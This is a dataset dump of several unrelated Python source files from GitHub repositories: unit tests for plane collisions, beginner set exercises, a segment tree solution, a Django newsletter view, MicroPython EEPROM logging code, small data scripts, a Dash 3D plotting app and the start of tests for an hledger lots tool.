pycollision.planes import create_xy_plane, create_xz_plane, \\\n create_yz_plane\nfrom pycollision.rotation import create_rotation_matrix, \\\n create_rotation_X, \\\n create_rotation_Y, \\\n create_rotation_Z\n\nimport numpy as np\n\n\nimport unittest\n\nfrom unittest import mock\nfrom unittest.mock import patch\nimport io\n\n\nclass TestInit(unittest.TestCase):\n # test xy plane\n def test_test1(self):\n p1 = create_xy_plane(1)\n\n v = np.array([0., 0., 1.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test xz plane\n def test_test2(self):\n p1 = create_xz_plane(1)\n\n v = np.array([0., 1., 0.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane\n def test_test3(self):\n p1 = create_yz_plane(1)\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(p1.distance, 1.)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane + translation parallel to norm vector\n def test_test4(self):\n p1 = create_yz_plane(1)\n p1.translation = [1, 0., 0.]\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(np.isclose(p1.distance, 2.), True)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n # test yz plane + translation to another direction\n def test_test4(self):\n p1 = create_yz_plane(1)\n p1.translation = [1, -100, 22000.]\n\n v = np.array([1., 0., 0.])\n\n self.assertEqual(np.isclose(p1.distance, 2.), True)\n self.assertEqual(np.all(p1.norm_vector == v), True)\n\n\nclass TestCollision(unittest.TestCase):\n # 2 xy planes with difference = 1\n def test_test1(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1)\n\n result = p1.has_collisions(p2)\n\n self.assertEqual(result['collision'], False)\n\n # xy and yz collision\n def test_test2(self):\n p1 = create_xy_plane(0)\n p2 = 
create_yz_plane(1)\n\n result = p1.has_collisions(p2)\n\n # 2 xy planes parallel to test atol\n def test_test10(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1e-5)\n\n result = p1.has_collisions(p2, atol=1e-4)\n\n self.assertEqual(result['collision'], True)\n\n def test_test11(self):\n p1 = create_xy_plane(0)\n p2 = create_xy_plane(1e-5)\n\n result = p1.has_collisions(p2, atol=1e-6)\n\n self.assertEqual(result['collision'], False)\n\n # test all parameters for has_collisions\n def test_test20(self):\n p1 = create_xy_plane(0)\n p2 = create_yz_plane(1)\n\n result = p1.has_collisions(p2, verbose=True, item='value')\n\n # test of collision with not collision objects\n def test_test100(self):\n p1 = create_xy_plane(0)\n i = 1 # int object\n\n with self.assertRaises(ValueError) as context:\n result = p1.has_collisions(i)\n","repo_name":"ocordes/pycollision","sub_path":"tests/test_plane.py","file_name":"test_plane.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16265411878","text":"songs = {\"Love It If We Made It\", \"Honey\", \"Malamente \"}\nprint(songs)\nprint(\"-\"*40)\n\n# Challenge Task 2 of 3\n# ---------------------\n# Awesome. Now use the .add() method to add the title \"Treehouse Hula\" to songs.\nsongs.add(\"Treehouse Hula\")\nprint(songs)\nprint(\"-\"*40)\n\n# Challenge Task 3 of 3\n# ---------------------\n# Alright, and last task. Use .update() to add the following two sets to your songs set.\n# {\"Python Two-Step\", \"Ruby Rhumba\"}\n# {\"My PDF Files\"}\nsongs.update({\"Python Two-Step\", \"Ruby Rhumba\"}, {\"My PDF Files\"})\nprint(songs)\nprint(\"-\"*40)\n\n# ---------------------\n# Challenge Task 1 of 2\n# ---------------------\n# Let's write some functions to explore set math a bit more. \n# We're going to be using this COURSES dict in all of the examples. Don't change it, though!\n# So, first, write a function named covers that accepts a single parameter, a set of topics. \n# Have the function return a list of courses from COURSES where the supplied set and the course's value (also a set) overlap.\n# For example, covers({\"Python\"}) would return [\"Python Basics\"].\nCOURSES = {\n \"Python Basics\": {\"Python\", \"functions\", \"variables\",\n \"booleans\", \"integers\", \"floats\",\n \"arrays\", \"strings\", \"exceptions\",\n \"conditions\", \"input\", \"loops\"},\n \"Java Basics\": {\"Java\", \"strings\", \"variables\",\n \"input\", \"exceptions\", \"integers\",\n \"booleans\", \"loops\"},\n \"PHP Basics\": {\"PHP\", \"variables\", \"conditions\",\n \"integers\", \"floats\", \"strings\",\n \"booleans\", \"HTML\"},\n \"Ruby Basics\": {\"Ruby\", \"strings\", \"floats\",\n \"integers\", \"conditions\",\n \"functions\", \"input\"}\n}\n\ndef covers(topics):\n response = []\n for course, course_topics in COURSES.items():\n if course_topics.intersection(topics):\n response.append(course)\n return response\n\nprint(covers({\"Python\"}))\nprint(\"-\"*40)\n\n# ---------------------\n# Challenge Task 2 of 2\n\n# Great work!\n\n# OK, let's create something a bit more refined. \n# Create a new function named covers_all that takes a single set as an argument. \n# Return the names of all of the courses, in a list, where all of the topics in the supplied set are covered.\n# \n# For example, covers_all({\"conditions\", \"input\"}) would return\n# [\"Python Basics\", \"Ruby Basics\"]. 
\n# Java Basics and PHP Basics would be excluded because they don't include both of those topics.\ndef covers_all(input_set):\n response = []\n for course, topics in COURSES.items():\n if input_set.intersection(topics) == input_set:\n response.append(course)\n return response\n\nprint(covers_all({\"conditions\", \"input\"}))\n","repo_name":"duliodenis/python_master_degree","sub_path":"unit_02/03_collections/5-sets/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"2870973758","text":"import math\nimport sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nN, Q = map(int, input().split())\ndata = [0] + list(map(int, input().split()))\n\ntree = [0] * 2**(math.ceil(math.log2(N))+1)\n\ndef init(node, left, right):\n if left == right:\n tree[node] = data[left]\n return tree[node]\n\n else:\n mid = (left+right) // 2\n tree[node] = init(node*2, left, mid) + init(node*2+1, mid+1, right)\n return tree[node]\n\ninit(1, 1, N)\n\ndef update(node, left, right, idx, value):\n if left == right == idx:\n tree[node] = value\n return\n\n elif idx < left or right < idx:\n return\n \n else:\n mid = (left+right) // 2\n update(node*2, left, mid, idx, value)\n update(node*2+1, mid+1, right, idx, value)\n tree[node] = tree[node*2] + tree[node*2+1]\n return\n\n\ndef sub_sum(node, left, right, start, end):\n global result\n if start <= left and right <= end:\n result += tree[node]\n return\n \n elif right < start or end < left:\n return\n\n else:\n mid = (left+right) // 2\n sub_sum(node*2, left, mid, start, end)\n sub_sum(node*2+1, mid+1, right, start, end)\n\nfor _ in range(Q):\n x, y, a, b = map(int, input().split())\n if x > y: x, y = y, x\n result = 0\n sub_sum(1, 1, N, x, y)\n print(result)\n update(1, 1, N, a, b)\n","repo_name":"SimplePro/Algorithm","sub_path":"커피숍2.py","file_name":"커피숍2.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23069352509","text":"from django.contrib import messages\nfrom django.shortcuts import render\nfrom django.core.mail import send_mail\n\nfrom .models import NewsletterUser\nfrom .forms import NewsletterUserSignUpForm\n\n\ndef newsletter_signup(request):\n \"\"\"\n newsletter signup\n \"\"\"\n form = NewsletterUserSignUpForm(request.POST or None)\n\n if form.is_valid():\n instance = form.save(commit=False)\n if NewsletterUser.objects.filter(email=instance.email).exists():\n messages.warning(request, \"Hey, you are alredy signed up, thanks!\")\n else:\n instance.save()\n messages.success(request, \"You have successfully signed up!\")\n subject = \"Welcome to Active8!\"\n to_email = [instance.email]\n signup_message = \"\"\"Thank you for signing up! Let's go for an adventure\\\n Need to unsubscribe? 
Follow this link but we miss you!\\\n                            https://active8-adventures.herokuapp.com/newsletter/unsubscribe/\"\"\"\n            send_mail(\n                subject=subject,\n                from_email=\"from@active8.com\",\n                recipient_list=to_email,\n                message=signup_message,\n                fail_silently=False,\n            )\n\n    context = {\n        \"form\": form,\n    }\n    template = \"newsletters/sign_up.html/\"\n    return render(request, template, context)\n\n\ndef newsletter_unsubscribe(request):\n    \"\"\"\n    Newsletter unsubscribe\n    \"\"\"\n    form = NewsletterUserSignUpForm(request.POST or None)\n\n    if form.is_valid():\n        instance = form.save(commit=False)\n        if NewsletterUser.objects.filter(email=instance.email).exists():\n            NewsletterUser.objects.filter(email=instance.email).delete()\n            messages.success(request, \"You have successfully unsubscribed!\")\n            subject = \"Sorry you're leaving!\"\n            to_email = [instance.email]\n            unsubscribe_message = \"\"\"Come back for more adventures\"\"\"\n            send_mail(\n                subject=subject,\n                from_email=\"from@active8.com\",\n                recipient_list=to_email,\n                message=unsubscribe_message,\n                fail_silently=False,\n            )\n        else:\n            messages.warning(request, \"Email not found - are you signed up?\")\n\n    context = {\n        \"form\": form,\n    }\n    template = \"newsletters/unsubscribe.html\"\n    return render(request, template, context)\n","repo_name":"CeciliaSwe/portfolio-5th","sub_path":"newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42464922362","text":"from machine import Pin, I2C\r\nimport time\r\nimport utime\r\n\r\n#Pin initialization\r\n\r\n#0x50(eeprom)\r\nsda_pin2 = Pin(12) \r\nscl_pin2 = Pin(13)\r\ni2c_eeprom = I2C(0,sda = sda_pin2, scl = scl_pin2, freq = 100000)\r\n\r\n#0x68(adc)\r\nsda_pin1 = Pin(26) \r\nscl_pin1 = Pin(27)\r\ni2c_adc = I2C(1,sda = sda_pin1, scl = scl_pin1, freq = 100000)\r\n\r\n#Flight pin\r\nFP = Pin(0, Pin.IN, Pin.PULL_DOWN)\r\n\r\n#=============================================================================\r\n#Display the I2C addresses (for debugging)\r\nprint(\"---address of eeproms and adc---\")\r\nfor i in i2c_eeprom.scan():\r\n    d = hex(i)\r\n    print(\"I2C_address; \",d)\r\nprint(\"-----------------------------\")\r\n#=============================================================================\r\n\r\n\r\n\r\n\r\n'''Constant settings and initial values for each variable'''\r\naddr = 0x0000 #memory address at which writing starts\r\ndevice_address = [80,84] #slave addresses (EEPROM)\r\nk = 0 #index into the slave address list\r\ncount = 10922 #number of iterations of the main write loop\r\nt = 5000 #data sampling period (ms)\r\ndot_posi = 0 #variable holding the position of the decimal point\r\n\r\n\r\n#i2c_adc.writeto(0x68,b'\\x89')\r\n#config = 0b10011000\r\n#i2c_adc.writeto_mem(addr, b'\\x98', config)\r\n'''------------------'''\r\n\r\n\r\n\r\ntime.sleep(0.1)\r\n\r\n\r\n\r\n'''------------Function definitions-------------------------------'''\r\n\r\ndef read_adc():\r\n    try:\r\n        i2c_adc.writeto(0x68,b'\\x98') # assumes the MCP3425 address is 0x68\r\n        time.sleep_ms(t)\r\n        data = i2c_adc.readfrom(0x68, 3)\r\n        data1 = (data[0] << 8) | data[1]\r\n        \r\n        \r\n        voltage = data1 * 2.047 / 32767#16bit (sign + 15bit)\r\n        difpres = ( voltage / 5 - 0.04) / 0.0012858\r\n        \r\n        if difpres < 0:\r\n            difpres = 0\r\n        \r\n\r\n        \r\n        print(difpres)\r\n        \r\n    except (ValueError , OSError) :\r\n        print(\"!Error!\")\r\n        difpres = 99999999\r\n        time.sleep_ms(t)\r\n        \r\n        \r\n    return difpres\r\n\r\n\r\n\r\n'''\r\n#EEPROM write function definition\r\n'''\r\ndef writeData(buff):\r\n    #print(\"buff>>\",buff)\r\n    i2c_eeprom.writeto_mem(device_address[k], addr, bytes([buff & 0xFF]), addrsize=16)\r\n    time.sleep(0.01)\r\n    \r\n'''\r\nFunction format_decimal(num)\r\n num (any positive integer or positive decimal) >>> list (all elements str, length 9)\r\nGiven the time-averaged sensor output as an integer or a decimal with any number of digits,\r\ntreat it as an 8-digit decimal and return a list of 9 elements (all str): the 8 digit\r\ncharacters plus the decimal point.\r\nEven if a fault makes the pressure sensor emit abnormal values (integer part 0, integer part\r\nof 8 or more digits, etc.), they are stored in the list without raising an exception.\r\n(If the integer part has 8 or more digits, every element is filled with 9. Program operation\r\nis not disturbed.)\r\n\r\nExamples:\r\nformat_decimal(234.56)\r\n ['0', '2', '3', '4', '.', '5', '6', '0', '0']\r\nformat_decimal(123456789.1)\r\n ['9', '9', '9', '9', '.', '9', '9', '9', '9'] <-- filled with 9\r\nformat_decimal(12345678)\r\n ['0', '0', '0', '0', '.', '1', '2', '3', '4']\r\nformat_decimal(1.2345678)\r\n ['0', '.', '1', '2', '3', '4', '5', '6', '8']\r\n'''\r\ndef format_decimal(num):\r\n    num_str = str(num)\r\n    if '.' in num_str:\r\n        int_part, dec_part = num_str.split('.')\r\n    else:\r\n        int_part, dec_part = num_str, ''\r\n\r\n    if len(int_part) > 8:\r\n        return ['9'] * 9\r\n\r\n    dec_part_len = 8 - len(int_part)\r\n    if len(dec_part) > dec_part_len:\r\n        dec_part = dec_part[:dec_part_len]\r\n    else:\r\n        dec_part += '0' * (dec_part_len - len(dec_part))\r\n\r\n    num_str = int_part + '.' + dec_part\r\n    return list(num_str)\r\n\r\n\r\n\r\n\r\n'''\r\nFunction detect_dot(lst)\r\nlist (elements str) >>> dot_posi (int)\r\n Searches the 9-element str list for the decimal point \".\" and stores its position\r\n number in dot_posi. If no element is a decimal point, 99 is stored in dot_posi.\r\nExample: \r\n |0|1|2|3|4|5|6|7|8| <position number (index)\r\n 1 0 0 7 . 6 5 4 9  <list elements\r\n in this case dot_posi = 4 \r\n'''\r\ndef detect_dot(lst):\r\n    global dot_posi\r\n    try:\r\n        dot_posi = lst.index('.')\r\n    except ValueError:\r\n        dot_posi = 99\r\n    #print(\"dot_posi \",dot_posi) \r\n    return dot_posi\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nFunction exclude_dot(lst)\r\nlist (elements str) >>> list (elements str)\r\n\r\nRemoves the decimal point from a length-9 list that contains one and returns a length-8 list.\r\nIf there is no decimal point (that is, if format_decimal(num) filled all 9 elements\r\nwith 9), a list whose 8 elements are all 9 is returned.\r\n\r\nThis function post-processes the list produced by format_decimal(num).\r\nAlways place it after format_decimal(num).\r\n\r\n\"\"\"\r\ndef exclude_dot(lst):\r\n    # if every element is 9, return [9]*8\r\n    if lst.count('9') == len(lst):\r\n        return [9] * 8\r\n    # get the index of '.'\r\n    dot_index = lst.index('.')\r\n    # build the list without '.'\r\n    int_lst = lst[:dot_index] + lst[dot_index+1:]\r\n    # convert the elements to int\r\n    int_lst = [int(x) for x in int_lst]\r\n    # pad with 0 if fewer than 8 digits\r\n    if len(int_lst) < 8:\r\n        int_lst += [0] * (8 - len(int_lst))\r\n    # truncate if more than 8 digits\r\n    elif len(int_lst) > 8:\r\n        int_lst = int_lst[:8]\r\n    return [str(i) for i in int_lst] #convert all elements back to str and return \r\n\r\n\r\n\r\n\r\n'''\r\nFunction split_list\r\nlist (str) >>> list (int)\r\nSplits a given length-8 list of str integer elements into pairs and returns a length-4 list of ints.\r\nThe list given as the argument must have exactly 8 elements, all of which must be str digits.\r\n\r\nExample:\r\nsplit_list(['1', '2', '3', '4', '0', '1', '2', '3'])\r\n >>[12, 34, 1, 23]\r\n \r\n\r\ndef split_list(lst):\r\n    result = []\r\n    for i in range(0, len(lst), 2):\r\n        if i + 1 < len(lst):\r\n            result.append([lst[i], lst[i+1]]) #join two elements at a time\r\n        else:\r\n            result.append([lst[i]])\r\n        if len(result) == 4:\r\n            break\r\n    return [[int(j) for j in sublst] for sublst in result]\r\n'''\r\n\r\ndef split_list(lst):\r\n    \"\"\"Groups a given list of eight single-digit positive integers two elements at a time and returns a length-4 list of one- or two-digit int elements.\r\n    If the elements of the given list do not satisfy the conditions above, the list ['99']*4 is returned.\r\n\r\n    Args:\r\n        lst (list): A list of eight single-digit positive integer elements.\r\n\r\n    Returns:\r\n        list: A length-4 list of one- or two-digit int elements grouped two at a time, or ['99']*4.\r\n\r\n    Examples:\r\n        >>> split_list(['1', '2', '0', '4', '5', '6', '7', '0'])\r\n        [12, 4, 56, 70]\r\n        >>> split_list(['1', '2', '3', '4', '5', '6', '7', '8'])\r\n        [12, 34, 56, 78]\r\n        >>> split_list(['a', '2', '3', '4', '5', '6', '7', '8'])\r\n        ['99', '99', '99', '99']\r\n    \"\"\"\r\n    # if lst is not of length 8, return [99]*4\r\n    if len(lst) != 8:\r\n        return [99]*4\r\n    \r\n    # group two elements at a time and return a list of one- or two-digit ints\r\n    return [int(lst[i] + lst[i+1]) for i in range(0, 8, 2)]\r\n\r\n\r\n'''\r\n\r\nFunction write_to_eeprom\r\nWrites one data item (5 bytes). The 4 elements (one- or two-digit integers) of the length-4\r\ninteger list obtained from split_list are written to the first 4 bytes, and dot_posi is\r\nwritten to the 5th byte. These 5 bytes form the storage area for a single pressure value.\r\n'''\r\ndef write_to_eeprom(lis):\r\n    global addr\r\n    for i in range (len(lis)):\r\n        intdata = lis[i]\r\n        #print(intdata)\r\n        writeData(intdata)\r\n        addr += 1\r\n        #print(\"dataADDRESS=\",addr)\r\n    writeData(int(dot_posi)) \r\n    addr += 1\r\n    time.sleep(0.1)\r\n    #print(\"dotADDRESS=\",addr)\r\n\r\n'''------------------End of function definitions----------------------------------'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#########################################################\r\n\r\n\r\n\r\nfor i in range(count):\r\n    \r\n    list1 = format_decimal(read_adc())\r\n    #print(\"a:\",list1)\r\n    '''list1 = ['1','0','0','6','.','5','5','1','0'] Convert the data into a length-9 list of str elements, decimal point included.'''\r\n    detect_dot(list1) #update dot_posi; this is where the decimal point position is assigned to dot_posi\r\n    list2 = exclude_dot(list1)\r\n    #print(\"b:\",list2)\r\n    #print(\"dot:\",dot_posi)\r\n    '''list2 = ['1','0','0','6','5','5','1','0'] Remove the decimal point from the list; it now has 8 elements.'''\r\n    list3 = split_list(list2)\r\n    #print(\"c:\",list3)\r\n    '''list3 = [10,6,55,10] Convert the pairs to integers and build a new length-4 list'''\r\n    write_to_eeprom(list3)\r\n    '''Write the integer elements of list3 to bytes 1-4 and dot_posi to byte 5.\r\n    The pressure value 1006.551 is now stored in the EEPROM.'''\r\n    #print(\"writed_address!!\",i)\r\n    \r\n    if FP.value() == 1:\r\n        t = 100\r\n        #print(\"FP\")\r\n        pass\r\n    \r\n    elif addr >= 0xFFFF:\r\n        k = 1\r\n        addr = 0x0000\r\n        continue\r\n    \r\n    \r\n\r\n    \r\n\r\n    \r\n#print(\"write cycle over !!\")\r\n########################################################\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PLANET-Qdeveloper/NSE2023_MISSION","sub_path":"EEPROM読み書き試験(ADC使用).py","file_name":"EEPROM読み書き試験(ADC使用).py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"32677922323","text":"#!/usr/bin/env python\nimport sys\nimport csv\nimport json\nimport fileinput\n\ndef main(argv):\n    args = argv[1:]\n    fp = fileinput.input(args)\n    keys = None\n    a = []\n    for row in csv.reader(fp):\n        if keys is None:\n            keys = row\n        else:\n            obj = dict(zip(keys, row))\n            a.append(obj)\n    print(json.dumps(a))\n    return 0\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/slides","sub_path":"sem20190914/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
{"seq_id":"24397416267","text":"import pathlib\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.ticker import FormatStrFormatter\n\nsns.set_context(\"paper\")\n\nKEYS = (\"Volumetric Strain\",\n        \"Normalized Surface Area Change\",\n        \"Deformed Surface Area to Volume\")\n\nTITLES = (\"Volumetric Strain\",\n          \"Normalized Surface Area Change\",\n          \"Surface Area to Volume Ratio\")\n\n\ndef main(filename):\n    file = pathlib.Path(filename)\n    dataframe = pd.read_excel(file)\n    fig, axs = plt.subplots(len(KEYS), 1, sharex=True, figsize=(4, 6))\n    for i, key in enumerate(KEYS):\n        dataframe.boxplot(column=[key], by=\"Time\", notch=True, showfliers=False,\n                          grid=False, ax=axs[i],\n                          color=dict(boxes='k', whiskers='k',\n                                     medians='k'))\n        axs[i].set_title(TITLES[i])\n        axs[i].yaxis.set_major_formatter(FormatStrFormatter('%0.3f'))\n        if i < len(KEYS) - 
1:\n axs[i].set_xlabel(\"\")\n else:\n axs[i].set_xlabel(\"Time (min)\")\n fig.suptitle(\"\")\n plt.tight_layout()\n plt.savefig(filename.replace(\".xlsx\", \"_boxplot.svg\"))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[-1])\n","repo_name":"siboles/resonant_lsm","sub_path":"src/scripts/boxplot.py","file_name":"boxplot.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43135012078","text":"import os\nimport plotly.graph_objects as go\n\nimport dash\nfrom dash import dcc\nfrom dash import html\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport math\nimport gspread\n\n\n\nX = []\nY = []\nZ = []\nT = []\n\nX_input = []\nY_input = []\nT_input = []\nZ_input = []\n\nx_min=0\nx_max=0\ny_max=0\ny_min=0\nz_min=0\nz_max=0\n\n# ---------- Initialize X, Y, Z ----------\ndef f(x, y, t):\n return (math.sin(x * x + y * y) /(x * x+0.1 + y * y+0.1))+ t\n\n\n\ndef calculate(X,Y,Z,t):\n for i in np.arange(len(X)):\n for j in np.arange(len(Y)):\n Z[i][j] = f(X[i], Y[j],t)\n\n\n\n# ---------- Generate graphs ----------\nlayout = {'title': {'text': '3D'}}\n\nfig = go.Figure(data=[go.Surface()], layout=layout)\n\n# ---------- Display ----------\n\napp = dash.Dash()\napp.title = \"Steepest Descent\"\n\nserver = app.server\n\nbadge = dbc.Button(\n [\n \"Start\",\n dbc.Badge(\"\", color=\"light\", text_color=\"primary\", className=\"ms-1\"),\n ],\n color=\"primary\",\n)\napp.layout = html.Div([\n # graph\n html.Div( # size of plot in style\n #children=[dcc.Graph(id='my-graph', figure=fig, style={'width': '50vh', 'height': '50vh', 'display':'inline-block'})]\n dcc.Graph(id='my-graph', figure=fig, style={'width': '50vh', 'height': '50vh', 'display':'inline-block'})\n ),\n # slider\n\n\n dcc.Slider(\n id='my-slider',\n min=0,\n max=0,\n step=0,\n value=0,\n\n marks={},\n ),\n\n html.Div(id='slider-output-container'),\n\n # button\n # x\n html.Div(dcc.Input(id='inputX_start', type='number', placeholder=\"x_start=\")),\n html.Div(dcc.Input(id='inputX_change', type='number', placeholder=\"x_change=\")),\n html.Div(dcc.Input(id='inputX_end', type='number', placeholder=\"x_end=\")),\n\n # y\n html.Div(dcc.Input(id='inputY_start', type='number', placeholder=\"y_start=\")),\n html.Div(dcc.Input(id='inputY_change', type='number', placeholder=\"y_change=\")),\n html.Div(dcc.Input(id='inputY_end', type='number', placeholder=\"y_end=\")),\n\n # t\n\n html.Div(dcc.Input(id='inputT_start', type='number', placeholder=\"t_start=\")),\n html.Div(dcc.Input(id='inputT_change', type='number', placeholder=\"t_change=\")),\n html.Div(dcc.Input(id='inputT_end', type='number', placeholder=\"t_end=\")),\n\n\n html.Div(id='container', children=''),\n\n html.Button('Submit', id='submit', n_clicks=0),\n\n]\n\n)\n\n\n@app.callback(\n dash.dependencies.Output('container', 'children'),\n dash.dependencies.Input('submit', 'n_clicks'),\n [dash.dependencies.State('inputX_start', 'value'),\n dash.dependencies.State('inputX_change', 'value'),\n dash.dependencies.State('inputX_end', 'value'),\n dash.dependencies.State('inputY_start', 'value'),\n dash.dependencies.State('inputY_change', 'value'),\n dash.dependencies.State('inputY_end', 'value'),\n dash.dependencies.State('inputT_start', 'value'),\n dash.dependencies.State('inputT_change', 'value'),\n dash.dependencies.State('inputT_end', 'value'),\n ],\n)\n\n\ndef update_output(n_clicks, x_start, x_change, x_end, y_start, y_change, y_end, t_start, t_change, t_end):\n # так можно 
доставать вытащить значения для callback элемента.\n # X=value\n # print(X)\n if not n_clicks:\n return( x_start, x_change, x_end, y_start, y_change, y_end, t_start, t_change, t_end)\n\n print(x_start)\n print(x_change)\n print(x_end)\n X_input.clear()\n Y_input.clear()\n T_input.clear()\n for i in np.arange(x_start, x_end+x_change, x_change):\n X_input.append(round(i,5))\n for i in np.arange(y_start, y_end+y_change, y_change):\n Y_input.append(round(i,5))\n for i in np.arange(t_start, t_end+t_change, t_change):\n T_input.append(round(i,5))\n\n\n x_max = x_start\n x_min = x_end\n y_max = y_start\n y_min = y_end\n\n\n #fig.update_xaxes(range=[x_start, x_end])\n #fig.update_yaxes(range=[y_start, y_end])\n\n\n return 'The input value was {}_____{}_____{}_____{}_____{}_____{}_____{}_____{}_____{}_____ '.format(\n round(x_start,5), round(x_change,5), round(x_end,5),round(y_start,5), round(y_change,5), round(y_end,5), round(t_start,5), round(t_change,5), round(t_end, 5), n_clicks\n\n\n )\n\n\n@app.callback(\n dash.dependencies.Output(\"my-slider\", \"min\"),\n dash.dependencies.Output(\"my-slider\", \"max\"),\n dash.dependencies.Output(\"my-slider\", \"value\"),\n dash.dependencies.Output(\"my-slider\", \"step\"),\n dash.dependencies.Output(\"my-slider\", \"marks\"),\n dash.dependencies.Input(\"submit\", \"n_clicks\"),\n dash.dependencies.State(\"my-slider\", \"min\"),\n dash.dependencies.State(\"my-slider\", \"max\"),\n dash.dependencies.State(\"my-slider\", \"value\"),\n dash.dependencies.State(\"my-slider\", \"step\"),\n dash.dependencies.State(\"my-slider\", \"marks\"),\n dash.dependencies.State('inputT_start', 'value'),\n dash.dependencies.State('inputT_change', 'value'),\n dash.dependencies.State('inputT_end', 'value'),\n)\ndef update_slider(nClicks, sliderMin, sliderMax, sliderValue, sliderStep, sliderMarks,t_start, t_change, t_end):\n\n if not nClicks:\n return (sliderMin, sliderMax, sliderValue,sliderStep, sliderMarks)\n\n if isinstance(t_change, int):\n return (t_start, t_end, 0, t_change, {i: '{}'.format(i) for i in range(t_start, t_end + t_change, t_change)})\n else:\n return (t_start, t_end, 0, t_change, {i: '{}'.format(i) for i in np.arange(t_start, t_end + t_change, t_change)})\n\n\n\n# slider callback for t . 
graphic\n@app.callback(\n dash.dependencies.Output('slider-output-container', 'children'),\n dash.dependencies.Input('my-slider', 'value')\n)\ndef update_output(value):\n # printedvalue=value\n # print(printedvalue)\n return 'You have selected t=\"{}\"'.format(value)\n\n\n@app.callback(dash.dependencies.Output('my-graph', 'figure'),\n [dash.dependencies.Input('my-slider', 'value')]\n )\ndef update_graph(value):\n\n tvalue = value\n\n Z_input = np.zeros((len(X_input), len(Y_input)))\n\n X = X_input\n Y = Y_input\n\n Z = Z_input\n print('Z_input=', Z_input)\n calculate(X, Y, Z, tvalue)\n print('X=', X)\n print('Y=', Y)\n print('Z=', Z)\n # print('X size =', len(X))\n # print('Y size=', len(Y))\n # print('Z size=', len(Z))\n Z_transpose =Z.transpose()\n\n # z_min = Z_transpose[0]\n # z_max = Z_transpose[-1]\n # fig = go.Figure(data=[go.Surface(x=X, y=Y, z=Z)], go.Layout(\n #\n #\n # ))\n\n\n fig = go.Figure(data=[go.Surface(x=X, y=Y, z= Z_transpose)], layout=layout)\n\n # fig.update_layout(go.Layout(\n # autosize=False,\n #\n # xaxis=dict(range=[-10, 10],autorange=False),\n # yaxis=dict(range=[-4, 4],autorange=False),\n #\n # title=\"Start Title\"\n # ))\n if (len(X) != 0 and len(Y) != 0 and len(Z) != 0):\n asp_x = X[-1]\n asp_y = Y[-1]\n asp_z = abs(max(max(x) for x in Z_transpose))\n #print('Z_transpose',Z_transpose[-1])\n if (len(X) != 0 and len(Y) != 0 and len(Z) != 0):\n fig.update_layout(\n scene=dict(\n xaxis=dict(nticks=4, range=[X[0], X[-1]], ),\n yaxis=dict(nticks=4, range=[Y[0], Y[-1]], ),\n zaxis=dict(nticks=4, range=([Z_transpose[0], Z_transpose[-1]]), ),\n #aspectmode='manual', #try to find good aspectmode to fix xyz size\n\n\n aspectratio=dict(x=asp_x, y=asp_y, z=asp_x),\n ),\n width=700,\n\n\n )\n name = 'default'\n camera = dict(\n eye=dict(x=asp_x, y=asp_y, z=asp_x)\n )\n\n fig.update_layout(scene_camera= camera, title=name)\n return fig\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, use_reloader=False)","repo_name":"devreon/server-client","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22428691345","text":"from hledger_lots import lib\nfrom hledger_lots.lib import AdjustedTxn\nimport pytest\nfrom datetime import date\nimport pyxirr\n\n\nclass TestGetAvg:\n def test_empty_list(self):\n assert lib.get_avg_fifo([]) == 0\n\n def test_single_txn(self):\n txn = AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n )\n assert lib.get_avg_fifo([txn]) == 100.0\n\n def test_multiple_txns(self):\n txns = [\n AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-02\", price=150.0, base_cur=\"USD\", qtty=5.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-03\", price=200.0, base_cur=\"USD\", qtty=20.0, acct=\"1234\"\n ),\n ]\n assert lib.get_avg_fifo(txns) == pytest.approx(164.28, abs=1e-2)\n\n def test_zero_quantity(self):\n txns = [\n AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n ),\n AdjustedTxn(\n 